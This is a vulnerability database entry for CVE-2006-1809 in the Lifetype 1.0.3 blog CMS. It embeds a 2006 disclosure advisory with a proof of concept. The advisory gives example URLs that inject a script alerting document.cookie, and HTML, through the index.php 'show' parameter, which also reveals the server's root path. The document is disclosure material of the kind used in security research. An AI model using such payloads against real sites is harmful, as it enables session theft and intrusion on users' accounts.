Lifetype index.php Information Disclosure Vulnerability

Vulnerability ID: 1195346 | Vulnerability type: Unknown
Published: 2006-04-18 | Updated: 2006-04-18
CVE ID: CVE-2006-1809 | CNNVD-ID: CNNVD-200604-284
Platform: N/A | CVSS score: 5.0
|Vulnerability source
https://www.securityfocus.com/bid/87705
https://cxsecurity.com/issue/WLB-2006040043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-284
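|Vulnerability details
index.php in Lifetype 1.0.3 allows remote attackers to obtain sensitive information via an invalid show parameter. The vulnerability discloses path information in an error message.
|Exploit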
 k  k         kkkk kk   kkkk  k  k  kkkkkk kkkkkk    kkkk   k    k   k   k  k
 k k         k   k  k  k   k  k k     kk   k     k  k    k  kk   k   k   k k
 kk   <><>   kkkkk  k  kkkkk  kk      kk   kkkkkk   k    k  k k  k   k   kk
 k k         k      k  k      k k     kk   k   k    k    k  k  k k   k   k k
 k  k         kkkk  kk  kkkk  k  k    kk   k    k    kkkk   k   kk   k   k  k

]=- Vulnerabilities in Lifetype

Author   : Rusydi Hasan M
a.k.a    : cR45H3R
Date     : April 13th, 2006
Location : Indonesia, Cilacap

]=- Software description

A CMS to manage a blog

Link    : http://www.lifetype.net
Version : 1.0.3
Author  : Oscar Renalias

]=- The bug

XSS a.k.a Cross Site Scripting + Full path disclosures

]=- [P]roof [O]f [C]oncept

http://[victim]/[lifetype_dir]/index.php?op=Template&blogId=1&show=[XSS_here]

E[x]ample :

http://127.0.0.1/lifetype/index.php?op=Template&blogId=1&show=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://127.0.0.1/lifetype/index.php?op=Template&blogId=1&show=%3Ch1%3EJust%20Test%20your%20URL%3C/h1%3E

And after that, you will see the location of the root directory, such as /var/www/html/.

]=- Vendor

%00

]=- Shoutz

# fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc
# y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the day
# ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben

]=- Contact

crasher (at) kecoak.or (dot) id || http://kecoak.or.id
|Affected products
LifeType LifeType 1.0.3
|References

Source: BUGTRAQ
Name: 20060414 Vulnerabilities in lifetype
Link: http://www.securityfocus.com/archive/1/archive/1/431008/100/0/threaded
Source: SECTRACK
Name: 1015941
Link: http://securitytracker.com/id?1015941
Source: XF
Name: lifetype-index-path-disclosure(25903)
Link: http://xforce.iss.net/xforce/xfdb/25903
Source: SREASON
Name: 711
Link: http://securityreason.com/securityalert/711